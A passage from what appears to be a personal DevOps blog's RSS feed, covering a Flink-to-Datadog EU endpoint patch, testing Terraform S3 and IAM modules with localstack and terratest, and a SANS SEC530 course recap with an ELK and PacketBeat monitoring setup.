&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.tags&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>name&lt;span class="p">:&lt;/span>flink-cluster&lt;span class="p">,&lt;/span>&lt;span class="w"> &lt;/span>app&lt;span class="p">:&lt;/span>flink-cluster&lt;span class="p">,&lt;/span>&lt;span class="w"> &lt;/span>region&lt;span class="p">:&lt;/span>eu-central&lt;span class="m">-1&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="w"> &lt;/span>env&lt;span class="p">:&lt;/span>prod&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">metrics.reporter.dghttp.dataCenter&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>EU&lt;span class="w"> &lt;/span>&lt;span class="c"># &amp;lt;&amp;lt; points the metrics reported to the EU region&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="p">[&lt;/span>...&lt;span class="p">]&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>The problem was that this was only available in Flink v1.11.0 while the highest version offered by EMR through the latest EMR Release was only v1.10.0, so this was not going to work for me. I almost gave up on the idea of monitoring Flink via Datadog when I had the idea to clone the official Flink repository from Github and tweak the code in v1.9.1 which we were running to change the hardcoded API endpoint from &lt;strong>.com&lt;/strong> to &lt;strong>.eu&lt;/strong>. It was much easier than I expected, I just needed to tweak this class slightly &lt;code>./src/main/java/org/apache/flink/metrics/datadog/DatadogHttpClient.java&lt;/code>:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-java" data-lang="java">&lt;span class="cm">/**
&lt;/span>&lt;span class="cm"> * Http client talking to Datadog.
&lt;/span>&lt;span class="cm"> */&lt;/span>
&lt;span class="kd">public&lt;/span> &lt;span class="kd">class&lt;/span> &lt;span class="nc">DatadogHttpClient&lt;/span> &lt;span class="o">{&lt;/span>
&lt;span class="cm">/* Changed endpoint for metric submission to use .eu instead of .com */&lt;/span>
&lt;span class="kd">private&lt;/span> &lt;span class="kd">static&lt;/span> &lt;span class="kd">final&lt;/span> &lt;span class="n">String&lt;/span> &lt;span class="n">SERIES_URL_FORMAT&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s">&amp;#34;https://app.datadoghq.eu/api/v1/series?api_key=%s&amp;#34;&lt;/span>&lt;span class="o">;&lt;/span>
&lt;span class="cm">/* Changed endpoint for API key validation to use .eu instead of .com */&lt;/span>
&lt;span class="kd">private&lt;/span> &lt;span class="kd">static&lt;/span> &lt;span class="kd">final&lt;/span> &lt;span class="n">String&lt;/span> &lt;span class="n">VALIDATE_URL_FORMAT&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s">&amp;#34;https://app.datadoghq.eu/api/v1/validate?api_key=%s&amp;#34;&lt;/span>&lt;span class="o">;&lt;/span>
&lt;span class="o">...&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Once I made the above code changes, I built a new JAR via &lt;code>mvn clean package&lt;/code>. The new JAR was made available at &lt;strong>./flink-metrics/flink-metrics-datadog/target/flink-metrics-datadog-1.9.1.jar&lt;/strong> which I then uploaded to an S3 bucket where we store such files in my team. Next I slightly tweaked the AWS EMR step to load this JAR from S3 redeployed the cluster once more. Finally, metrics started flowing! And it looked so nice, I was especially happy to see the TaskManager heap distribution, because the issue which sparked this whole endeavor was showing symptoms of Heap Memory issues.&lt;/p>
&lt;p>&lt;img src="./images/default-dashboard.png" alt="Default Datadog Flink Dashboard">&lt;/p>
&lt;p>Unfortunately this default dashboard was not perfect, as it had some graphs that were failing to show some data. Maybe it was because of using v1.9.1 of Flink instead of v1.11.0, not sure. In any case, I ended up cloning the dashboard and fixing the graphs manually, while also adding a few extras to show data about the AWS Kinesis streams which were feeding into the Flink cluster.&lt;/p>
&lt;p>&lt;img src="./images/custom-dashboard.jpg" alt="Custom Datadog Flink dashboard">&lt;/p>
&lt;p>Now it shows very nicely the age of each Flink job, which was not visible at all on the default dashboard. The end result is much better in my opinion.&lt;/p>
&lt;h2 id="conclusion">Conclusion&lt;/h2>
&lt;p>All in all, I am quite happy with how this whole story turned out in the end. Despite the issue with the hardcoded API endpoints to the USA region in v1.9.1 of Flink, I managed to implement a simple workaround thanks to the Open Source nature of the project. The result is that we have much better visibility and monitoring implemented for our Flink cluster which makes our lives in the DevOps world much better. I did not write much about it in this post, but once these metrics became available in our Datadog account it was trivial to set up a few Monitors which would alert us if for example one of the 4 Flink jobs were failing. I will leave it up to the reader to imagine how that&amp;rsquo;s done.&lt;/p></description></item><item><title>Testing Terraform Modules</title><link>https://flrnks.netlify.app/post/terraform-testing/</link><pubDate>Sun, 12 Jul 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/terraform-testing/</guid><description>&lt;h2 id="intro">Intro&lt;/h2>
&lt;p>I first head of Terraform about 1 year ago while working on an assignment for a job interview. The learning curve was steep, and I still remember how confused I was about the syntax of HCL that resembled JSON but was not exactly the same. I also remember hearing about the concept of Terraform Modules, but for the assignment it was not needed, so I skipped it for the time being.&lt;/p>
&lt;p>Fast forward to present day, I&amp;rsquo;ve had a good amount of exposure to Terraform Modules at work, where we use them to provision resources on AWS in a standardized and rapid fashion. In order to broaden my knowledge on Terraform Modules, I decided to create an exercise in which I created two TF Modules with using version 0.12 of Terraform. In this post I wanted to describe these two Terraform Modules and how I went about testing them to ensure they did what they were meant to.&lt;/p>
&lt;h2 id="what-is-a-terraform-module">What is a Terraform Module&lt;/h2>
&lt;p>According to official
&lt;a href="https://www.terraform.io/docs/configuration/modules.html" target="_blank" rel="noopener">documentation&lt;/a> a Terraform module is simply a container for multiple resources that are defined and used together. Terraform Modules can be embedded in each other to create a hierarchical structure of dependent resources. To define a Terraform Module one needs to create one or more Terraform files that define some input variables, some resources and some outputs. The input variabls are used to control properties of the resources, while the outputs are used to reveal information about the created resources. These are often organized into such structure as follows:&lt;/p>
&lt;ul>
&lt;li>&lt;code>variables.tf&lt;/code> defining the Terraform variables&lt;/li>
&lt;li>&lt;code>main.tf&lt;/code> creating the Terraform resources&lt;/li>
&lt;li>&lt;code>output.tf&lt;/code> listing the Terraform outputs&lt;/li>
&lt;/ul>
&lt;p>Note that the above is just an un-enforced convention, it simply makes it easier to get a quick understanding about a Terraform Module. As an example, if an organization needs to have their AWS S3 buckets secured with the same policies to protect their data, they can embed these security policies in a TF Module and then prescribe its use within the organization to enable those security policies automatically. Next up is an example of just that.&lt;/p>
&lt;h2 id="the-secure-bucket-tf-module">The Secure-Bucket TF Module&lt;/h2>
&lt;p>The first of the 2 Terraform Modules is &lt;code>tf-module-s3-bucket&lt;/code> which can be used to create an S3 bucket in AWS that is secured to a higher degree, so that it may be suitable for storing highly sensitive data. The security features of the bucket consists of:&lt;/p>
&lt;ul>
&lt;li>filtering on Source IPs that can access its contents&lt;/li>
&lt;li>enforcing encryption at rest (KMS) and in transit&lt;/li>
&lt;li>object-level and server access logging enabled&lt;/li>
&lt;li>filtering on IAM principals based on official
&lt;a href="https://aws.amazon.com/blogs/security/how-to-restrict-amazon-s3-bucket-access-to-a-specific-iam-role/" target="_blank" rel="noopener">docs&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>When using this module, one can define a list of IPs, and a list of IAM Principals to control who and from which networks can access the contents of the bucket. These restrictions are written into the Bucket Policy, which is considered a &lt;code>resource-based policy&lt;/code> that always takes precendence over Identity based policies, so it does not matter if an IAM Role has specific permission granted to access the bucket, if the bucket&amp;rsquo;s own Bucket Policy denies the same access. Below is a good overview of the whole evaluation logic of AWS IAM:&lt;/p>
&lt;p>&lt;img src="static/aws-iam.png" alt="AWS IAM Evaluation Logic">&lt;/p>
&lt;p>In addition, server-access and object-level logging can be enabled as well to improve the bucket&amp;rsquo;s level of auditability. Altogether, these settings can greatly elevate the security of data in the S3 bucket that was created by this module.&lt;/p>
&lt;h2 id="the-s3-authz-tf-module">The S3-AuthZ TF Module&lt;/h2>
&lt;p>This 2nd Terraform Module is called &lt;code>tf-module-s3-auth&lt;/code> and it was written to in part to complement the other one used to create an S3 bucket. The aim of this module is to help with the creation of a single IAM policy that can cover the S3 and KMS permissions needed for a given IAM Principal. The motivation behind this module comes from some difficulties I&amp;rsquo;ve faced at work which meant that some IAM Roles we used had too many policies attached. For further reference see the AWS
&lt;a href="https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html" target="_blank" rel="noopener">docs&lt;/a> on this.&lt;/p>
&lt;p>The Bucket Policy that is crafted by the first TF Module allows the definition of list of IAM Principals that are allowed to interact with the bucket. With this TF module one can actually define the particular S3 actions that those IAM Principals CAN carry out on the data in the bucket. Additionally, this TF module can also be used allow KMS actions on the KMS keys that are protecting the data at rest in the bucket.&lt;/p>
&lt;h2 id="untested-code-is-broken-code">Untested code is broken code&lt;/h2>
&lt;p>With infrastructure-as-code, just as with normal code, testing is often an afterthought. However, it seems to be catching on more and more nowadays. Nothing shows this better than the amount of search results in Google for &lt;code>Infrastructure as Code testing&lt;/code>: &lt;strong>235.000.000&lt;/strong> as of today (15.8.2020). While Infrastructure as Code is a much broader topic with many other interesting projects, this post will have a sole focus on Terraform. With Terraform, a good step in the right direction is as simple as running &lt;code>terraform validate&lt;/code> that can catch silly mistakes and syntax errors and provide feedback such as below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">Error: Missing required argument
on main.tf line 107, in output &lt;span class="s2">&amp;#34;s3_bucket_name&amp;#34;&lt;/span>:
107: output &lt;span class="s2">&amp;#34;s3_bucket_name&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
The argument &lt;span class="s2">&amp;#34;value&amp;#34;&lt;/span> is required, but no definition was found.
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In addition to the &lt;code>terraform validate&lt;/code> option, many IDEs such as IntelliJ, already have plugins that can alert to such issues, so I find myself not using it so often. However, it&amp;rsquo;s still nice to have this feature built into the &lt;code>terraform&lt;/code> executable!&lt;/p>
&lt;p>Once all syntax errors are fixed, the next stage of testing can continue with the &lt;code>terraform plan&lt;/code> command. This command uses &lt;strong>terraform state&lt;/strong> information (local or remote) to figure out what changes are needed if the configuration is applied. This is truly very useful in showing in advance what will be created or destroyed. However, a successful &lt;code>terraform plan&lt;/code> can still result in a failed deployment because some constraints cannot be verified without making the actual API calls to the Cloud Service Provider. The &lt;code>terraform plan&lt;/code> command does not make any actual API calls, it only computes the difference that exist between the Terraform Code vs. the Terraform State (local or remote). The failures are usually very provider specific.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">data &lt;span class="s2">&amp;#34;aws_iam_policy_document&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;Deny-Non-CiscoCidr-S3-Access&amp;#34;&lt;/span> &lt;span class="o">{&lt;/span>
statement &lt;span class="o">{&lt;/span>
&lt;span class="nv">sid&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Deny-All-S3-Actions-If-Not-In-IP-PrefixList&amp;#34;&lt;/span>
&lt;span class="nv">effect&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;Deny&amp;#34;&lt;/span>
&lt;span class="nv">actions&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;s3:*&amp;#34;&lt;/span> &lt;span class="o">]&lt;/span>
&lt;span class="nv">resources&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="o">[&lt;/span> &lt;span class="s2">&amp;#34;*&amp;#34;&lt;/span> &lt;span class="o">]&lt;/span>
condition &lt;span class="o">{&lt;/span>
&lt;span class="nb">test&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;NotIpAddress&amp;#34;&lt;/span>
&lt;span class="nv">variable&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="s2">&amp;#34;aws:SourceIp&amp;#34;&lt;/span>
&lt;span class="nv">values&lt;/span> &lt;span class="o">=&lt;/span> local.ip_prefix_list
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;span class="o">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This Terraform Code is syntactically correct nd passes the &lt;code>terraform validate&lt;/code>, and &lt;code>terraform plan&lt;/code> produces a valid plan. However, it still fails at the &lt;code>terraform apply&lt;/code> stage because AWS has a restriction on the &lt;code>sid&lt;/code>: &lt;strong>For IAM policies, basic alphanumeric characters (A-Z,a-z,0-9) are the only allowed characters in the Sid value&lt;/strong>. This constraint is never checked before &lt;code>terraform apply&lt;/code> is called, at which point it is going to fail the whole action with the below error:&lt;/p>
&lt;pre>&lt;code>An error occurred: Statement IDs (SID) must be alpha-numeric. Check that your input satisfies the regular expression [0-9A-Za-z]*
&lt;/code>&lt;/pre>&lt;p>Such types of errors can only be caught when making real API calls to the Cloud Service Provider (or to a truly identical mock of the real API) which will validate the calls and return errors if any are found. Next I will go into some details on how I went about testing the 2 Terraform Modules I wrote.&lt;/p>
&lt;h3 id="manual-testing-via-aws">Manual Testing via AWS&lt;/h3>
&lt;p>This most rudimentary form of testing can be done by setting up a real project that imports and uses the two Terraform modules. This test can be found in my repository&amp;rsquo;s &lt;code>test/terraform/aws/&lt;/code> directory. For this to work properly the AWS provider has to be set up with real credentials, which is beyond the scope of this post. I also opted to use S3 as TF state backend storage but this is optional, it can just ass well store the state locally in a &lt;code>.tfstate&lt;/code> file.&lt;/p>
&lt;p>First, terraform has to be initialized which will trigger the download of the AWS Terraform Provider via &lt;code>terraform init&lt;/code>. Next, the changes can be planned and applied via &lt;code>terraform plan &amp;amp; apply&lt;/code> respectively. It&amp;rsquo;s interesting to note that a complete &lt;code>terraform apply&lt;/code> takes close to 1 minute to complete:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">Apply complete! Resources: &lt;span class="m">7&lt;/span> added, &lt;span class="m">0&lt;/span> changed, &lt;span class="m">0&lt;/span> destroyed.
Outputs: &lt;span class="o">[&lt;/span>...&lt;span class="o">]&lt;/span>
real 0m49.090s
user 0m3.532s
sys 0m1.929s
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Once the &lt;code>terraform apply&lt;/code> is complete one can make manual assertions whether it went as expected based on the outputs (if any) and by manually inspecting the resources that were created. While this can be good enough for new setups, it may be not so good when an already deployed project has to be modified and one needs to make sure the changes will not have any undesired side effects.&lt;/p>
&lt;h3 id="manual-testing-via-localstack">Manual Testing via localstack&lt;/h3>
&lt;p>In order to save time (and some costs), one may also consider using &lt;strong>localstack&lt;/strong> which replicates most of the AWS API and its features to enable faster and easier development and testing. It&amp;rsquo;s important to note that it only works if one is an AWS customer. In an earlier
&lt;a href="https://flrnks.netlify.app/post/python-aws-datadog-testing/" target="_blank" rel="noopener">post&lt;/a> I&amp;rsquo;ve already written on how to set it up, so I will not repeat it here. The most important thing is to enable S3, IAM and KMS services in the
&lt;a href="https://github.com/florianakos/terraform-testing/blob/master/test/terraform/localstack/docker-compose.yml" target="_blank" rel="noopener">docker-compose.yaml&lt;/a> by setting this environment variable: &lt;code>SERVICES=s3,kms,iam&lt;/code> so the corresponding API endpoints are turned on.&lt;/p>
&lt;p>The Terraform files I wrote for testing with on real AWS can be re-used for testing with localstack with some tweaks, for more detail look to &lt;code>test/terraform/localstack/&lt;/code> folder in my repository. Then it&amp;rsquo;s just a matter of running &lt;code>terraform init&lt;/code> followed by a &lt;code>terraform plan &amp;amp; apply&lt;/code> to create the fake resources in Localstack.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">Apply complete! Resources: &lt;span class="m">7&lt;/span> added, &lt;span class="m">0&lt;/span> changed, &lt;span class="m">0&lt;/span> destroyed.
Outputs: &lt;span class="o">[&lt;/span> ... &lt;span class="o">]&lt;/span>
real 0m11.649s
user 0m3.589s
sys 0m1.580s
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Notice that this time the &lt;code>terraform apply&lt;/code> took only about 10 seconds, which is considerably faster than using the real AWS API.&lt;/p>
&lt;h3 id="automating-tests-via-terratest">Automating tests via Terratest&lt;/h3>
&lt;p>As I&amp;rsquo;ve shown, running tests via Localstack can be much faster on average, but sometimes a project may require the use of some AWS services that are not supported by Localstack. In this case it becomes necessary to run tests against the real AWS API. For such situations I recommend &lt;code>terratest&lt;/code> from
&lt;a href="https://terratest.gruntwork.io/" target="_blank" rel="noopener">Gruntwork.io&lt;/a>, which is a Go library that provides capabilities to automate tests.&lt;/p>
&lt;p>It still requires a terraform project to be set up, as described in &lt;code>Manual Testing via AWS&lt;/code>, however having the ability to formally define and verify tests can greatly increase the confidence that the code being tested will function the way it&amp;rsquo;s supposed to. In the test I implemented some assertions on the output values of the &lt;code>terraform apply&lt;/code> as well as about the existence of the S3 bucket just created. In addition, the Go library also provides ways to verify the AWS infrastructure setup, by making HTTP calls or SSH connections. This can be a pretty powerful tool.&lt;/p>
&lt;p>This &lt;code>terratest&lt;/code> setup can be found in my repo under
&lt;a href="https://github.com/florianakos/terraform-testing/blob/master/test/go/terraform_test.go" target="_blank" rel="noopener">test/go/terraform_test.go&lt;/a>.&lt;/p>
&lt;p>Running this test takes considerably longer than either of the two previous ones, but the advantage is that this can be easily automated and integrated into a CI/CD build where it can verify on-demand that the TF code still works as intended, even if there were some changes.&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-shell" data-lang="shell">▶ go &lt;span class="nb">test&lt;/span>
TestTerraform 2020-08-09T21:46:22+02:00 logger.go:66: Terraform has been successfully initialized!
...
TestTerraform 2020-08-09T21:47:30+02:00 logger.go:66: Apply complete! Resources: &lt;span class="m">7&lt;/span> added, &lt;span class="m">0&lt;/span> changed, &lt;span class="m">0&lt;/span> destroyed.
...
TestTerraform 2020-08-09T21:48:08+02:00 logger.go:66: Destroy complete! Resources: &lt;span class="m">7&lt;/span> destroyed.
...
PASS
ok github.com/florianakos/terraform-testing/tests 116.670s
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The basic idea of &lt;code>terratest&lt;/code> is to automate the process or creation and cleanup of resources for the purposes of tests. To avoid name clashes with existing AWS resources, it&amp;rsquo;s a good practice to append some random strings to resource names as part of the test, so they are not going to fail due to unique name constraints.&lt;/p>
&lt;h2 id="conclusion">Conclusion&lt;/h2>
&lt;p>In this post I have shown what options are available for testing a Terraform Module in local or remote settings. If one only works with AWS services then Localstack can be a great tool for quick local tests during development, while &lt;strong>terratest&lt;/strong> from Gruntwork can be a great help with codifying and automating such tests that run against the real AWS Cloud from your favourite CI/CD setup.&lt;/p></description></item><item><title>Defensible Security Architecture</title><link>https://flrnks.netlify.app/post/sans-sec530/</link><pubDate>Wed, 22 Apr 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/sans-sec530/</guid><description>&lt;p>In this post I wanted to write about my experience with #SEC530 which is a SANS course that I took in March during the
&lt;a href="https://www.sans.org/event/prague-march-2020/" target="_blank" rel="noopener">SANS Prague&lt;/a> event. Not long ago I wrote another
&lt;a href="https://flrnks.netlify.app/post/sans-netwars/">post&lt;/a> about my experience with NetWars in March, now I wanted to write about the infosec course that started it all.&lt;/p>
&lt;h2 id="defensible-security-architecture---sec530">Defensible Security Architecture - SEC530&lt;/h2>
&lt;p>Initially I was hesitant to register for an advanced level SANS course (5xx in the code). As I had no previous experience with SANS I did not know if an advanced infosec course would be too difficult for me. Luckily, I found a GIAC assessment exam online called &lt;strong>SANS Cybertalent Assessment Exam&lt;/strong>, which I took for free and eventually passed with a score of 93.33%. This made me confident in registering for #SEC530, as the assessment results stated:&lt;/p>
&lt;p>&lt;em>&amp;ldquo;Examinees who score in this range have demonstrated reliable knowledge in core information security principles [&amp;hellip;] they are typically ready for advanced security training&amp;rdquo;&lt;/em>.&lt;/p>
&lt;p>&lt;img src="cybertalent.png" alt="cyber-talent-assessment">&lt;/p>
&lt;h2 id="course-experience">Course Experience&lt;/h2>
&lt;h3 id="day-1">Day 1&lt;/h3>
&lt;p>The course was taking place at a hotel in Prague 5, about 10 mins walk from my flat, so I was quite happy about the venue. It was a nice hotel with plenty of room for my course and the other ones that were running in parallel with a dozen or so attendees each:&lt;/p>
&lt;ul>
&lt;li>
&lt;a href="https://www.sans.org/event/prague-march-2020/course/security-essentials-bootcamp-style" target="_blank" rel="noopener">#SEC401&lt;/a> - &lt;strong>Security Essentials Bootcamp Style&lt;/strong>&lt;/li>
&lt;li>
&lt;a href="https://www.sans.org/event/prague-march-2020/course/hacker-techniques-exploits-incident-handling" target="_blank" rel="noopener">#SEC504&lt;/a> - &lt;strong>Hacker Tools, Techniques, Exploits and Incident Handling&lt;/strong>&lt;/li>
&lt;/ul>
&lt;p>Some colleagues were taking #SEC504, I was alone from my workplace in taking #SEC530. This was nice because knowing nobody in my class forced me to get to know them, and they all turned out to be interesting people! This was also a good opportunity to start recruiting team mates for the NetWars challenge on Day 6!&lt;/p>
&lt;p>Our instructor was Mr.
&lt;a href="https://www.sans.org/instructors/ryan-nicholson" target="_blank" rel="noopener">Ryan Nicholson&lt;/a> from the United States with an interesting career path that led him to become a SANS Instructor. He used to be a Network Administrator in the past and made lots of references to Cisco networking equipment which made me quite nostalgic from time to time &amp;hellip; 😊&lt;/p>
&lt;p>Eventually the course kicked off and the first day&amp;rsquo;s goal was to get an overview of Defensible Security Architecture. We discussed the downsides of traditional approach to security and architecture, and how the defensible approach may improve the situation. We were given a recommended reading by Richard Bejtlich titled &lt;strong>The Tao of Network Security Monitoring&lt;/strong>, in which there is a really neat definition: &lt;strong>architecture that encourages, rather than frustrates, digital self-defence&lt;/strong>.&lt;/p>
&lt;p>The rest of the day we discussed many interesting topics, including the Layer 2 security that led to a discovery about the WLAN at the hotel: &lt;strong>station isolation&lt;/strong> was not enabled! This wouldn&amp;rsquo;t be a huge deal normally, but then we became aware of some fellow SANS students in the adjacent room taking the #SEC504 which is a red-team course that has topics such as penetration testing. This inspired me to take some actions as a blue-teamer, which I hoped would earn me the infamous Red coin for #SEC530&amp;hellip; More on this later in the &lt;code>Blue Team Project&lt;/code> section.&lt;/p>
&lt;h3 id="day-2">Day 2&lt;/h3>
&lt;p>After an interesting first day, we dived right-in to the material on the 2nd day titled: &lt;strong>Network Security Architecture and Engineering&lt;/strong>. This day taught me many interesting topics of L3 security, and provided some interesting lab exercises as well. Most interesting to me was the lab on the config auditing tool called &lt;code>nipper-ng&lt;/code> that can parse Cisco router/switch config files for security issues and provide actionable recommendations. This surely would have been a nice tool to have back when I worked as a Network Administrator.&lt;/p>
&lt;h3 id="day-3">Day 3&lt;/h3>
&lt;p>We continued with the material on the third day with &lt;strong>Network-Centric Security&lt;/strong> with a bunch of different topics on the menu, such as Next Generation Firewalls (NGFW), &lt;strong>Network Security Monitoring&lt;/strong> (NSM) and Secure Remote Access, just to name a few. Probably the most interesting topic for me was NSM that involves the passive capture (in- or out-of-band) and analysis of network / flow metadata. This gave me some good ideas for the &lt;code>Blue Team Project&lt;/code> described in a later section.&lt;/p>
&lt;p>After our lunch break, just before we resumed class, someone from the SANS support team came to our classroom and informed us that they decided to convert the class to remote/virtual mode of operation for the rest of the week, as a safety measure against the COVID-19 pandemic. Although it was quite frustrating to me at the time, I now totally agree with their approach to handling this safety concern. Eventually they did an excellent job of converting the class to run via the virtual CyberCast platform on such short notice!&lt;/p>
&lt;h3 id="day-4">Day 4&lt;/h3>
&lt;p>So on the morning o day four, I did not go to the nearby hotel where the first three days were held, instead I just logged in to my SANS account and accessed the CyberCast session where we continued the course. The teaching duty was split between two new remote instructors from the USA: for the first half of the day we had Mr.
&lt;a href="https://www.sans.org/instructors/greg-scheidel" target="_blank" rel="noopener">Greg Scheidel&lt;/a>, in the afternoon Mr.
&lt;a href="https://www.sans.org/instructors/ismael-valenzuela" target="_blank" rel="noopener">Ismael Valenzuela&lt;/a> took over to finish the rest of the material planned for the day.&lt;/p>
&lt;p>The main theme was &lt;strong>Data Centric Security&lt;/strong> which included topics such as Web Application Firewalls, Data Loss Prevention and some discussions on Cloud Security and containerisation technologies. This last topic was particularly interesting to me, because I had been learning about Docker prior to the SANS training and I had not really considered it from a security point of view before.&lt;/p>
&lt;h3 id="day-5">Day 5&lt;/h3>
&lt;p>This fifth day was dedicated to &lt;strong>Zero Trust Security Architecture&lt;/strong>, which was quite a new and interesting concept to me. During the first half of the day we covered the basic principles of Zero Trust (everything is hostile, verify before establishing trust) and how certain techniques such as mutual authentication can help improve security. The second half of the day with Ismael included some interesting topics such as Security Information and Event Management systems (SIEMs) which are indispensable tools for Security Operations Centres (SOC). This section also proved to have some very valuable lab exercises for the NetWars challenge the following day.&lt;/p>
&lt;h3 id="day-6---netwars">Day 6 - NetWars&lt;/h3>
&lt;p>This final day was dedicated to the DTF-style &lt;strong>NetWars Challenge&lt;/strong> that ran for about 6 hours. Three teams were formed amongst the class participants who competed against each other and agains the clock to solve the challenge questions that were testing our concepts taught during the course. I have to say I genuinely enjoyed every second of it. Our team was leading the scoreboard all the way until the very end, when we got kicked down to the 2nd place because we rushed to be the first and incurred some penalty for incorrect answers. Regardless of the final result, it was a very valuable experience with tons of fun and learning. For our efforts that got us the 2nd place, were rewarded with the much coveted blue coin of #SEC530 which &lt;del>will hopefully arrive by FedEx soon&lt;/del> has arrived to me in Prague via FedEx finally &amp;hellip; :)&lt;/p>
&lt;p>&lt;img src="blue-coin.png" alt="bluec-coin">&lt;/p>
&lt;h3 id="blue-team-project">Blue Team Project&lt;/h3>
&lt;p>As I previously mentioned, on the first day we discovered that all attendees of the SANS venue will be sharing a WLAN network without &lt;strong>station isolation&lt;/strong> and this was making me somewhat uncomfortable. Some years ago in a university course I had done some simple attacks using MITM technique on shared LAN networks, so I knew that it was not too difficult to steal credentials or do other kinds of malicious attacks when the attacker didn&amp;rsquo;t even have to crack the wifi password to be able to join the shared WLAN.&lt;/p>
&lt;p>Later I was wondering that perhaps the WLAN isolation feature was disabled on purpose so that the red-team students in the adjacent room could practice using some of the typical penetration testing tools. Regardless, this vulnerability enabled by the lack of WLAN isolation gave me the idea to implement some kind of defence system that can monitor and/or if possible alert me to any seemingly malicious attempts targeting my machine.&lt;/p>
&lt;p>My first idea was to run a packet capture on my Host OS via Wireshark, but of course that would have been very difficult to manage and quite likely not so effective! I would&amp;rsquo;ve had to keep an eye on it constantly and check for suspicious packets manually using some filters.&lt;/p>
&lt;p>Instead, I got some inspiration from one of the lab exercises with the ELK stack where we had to look for some suspicious log entries from various sources of security telemetry. I decided to set up a similar set of services to run non-stop on my #SEC530 virtual machine. To provide the network metadata I needed, I decided to install
&lt;a href="https://www.elastic.co/beats/packetbeat" target="_blank" rel="noopener">PacketBeat&lt;/a> and configured it to extract and forward &lt;strong>netflow&lt;/strong> data to the ELK stack. This way I could obtain the necessary visibility into the network activity on my Virtual Machine, without the need to do full packet capture using WireShark!&lt;/p>
&lt;p>With the below steps one can run the ELK stack via docker-compose in the #SEC530 VM:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="c1"># ELK stack setup&lt;/span>
mkdir monitor &lt;span class="o">&amp;amp;&amp;amp;&lt;/span> &lt;span class="nb">cd&lt;/span> monitor
cp /labs/1.3/docker-compose.yml ./
sed -i &lt;span class="s1">&amp;#39;17,18 s/^/#/&amp;#39;&lt;/span> docker-compose.yml &lt;span class="c1">#comment out some volumes not needed&lt;/span>
sed -i &lt;span class="s1">&amp;#39;s/lab13es/elastic_search/g&amp;#39;&lt;/span> docker-compose.yml
sed -i &lt;span class="s1">&amp;#39;s/kibana13/kibana_dashboard/g&amp;#39;&lt;/span> docker-compose.yml
docker container prune -f
docker-compose up
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Next I set installed and configured the OSS version of PacketBeat:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="c1"># PacketBeat setup&lt;/span>
curl -L -O https://artifacts.elastic.co/downloads/beats/packetbeat/packetbeat-oss-7.6.1-amd64.deb
sudo dpkg -i packetbeat-oss-7.6.1-amd64.deb
&lt;span class="nb">echo&lt;/span> &lt;span class="s2">&amp;#34;setup.dashboards.enabled: true&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> sudo tee -a /etc/packetbeat/packetbeat.yml
sudo packetbeat setup --dashboards
sudo service packetbeat start
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Now, one can test if it&amp;rsquo;s working by generating some network traffic from the VM which should then appear in the Kibana dashboard at &lt;code>http://localhost:5601/app/kibana&lt;/code>.&lt;/p>
&lt;p>&lt;img src="kibana.png" alt="kibana">&lt;/p>
&lt;p>At this point, it becomes possible to observe malicious hacking attempts by focusing on IP addresses from my local IP subnet&amp;hellip; But I was not yet fully satisfied and wanted to take it a bit further.&lt;/p>
&lt;h3 id="blue-team-project---next-level">Blue Team Project - Next Level&lt;/h3>
&lt;p>It was quite nice to see &lt;strong>netflow&lt;/strong> data being exported to the ELK stack in the previous setup, however I was a bit disappointed with the Kibana dashboards that were set up by PacketBeat. Some were completely dysfunctional due to some syntax errors I could not figure out how to fix.&lt;/p>
&lt;p>I spent quite a long time looking for a fix to the Kibana dashboard issues, but eventually I ended up swapping my ELK &amp;amp; PacketBeat setup for a more advanced set of Tools:
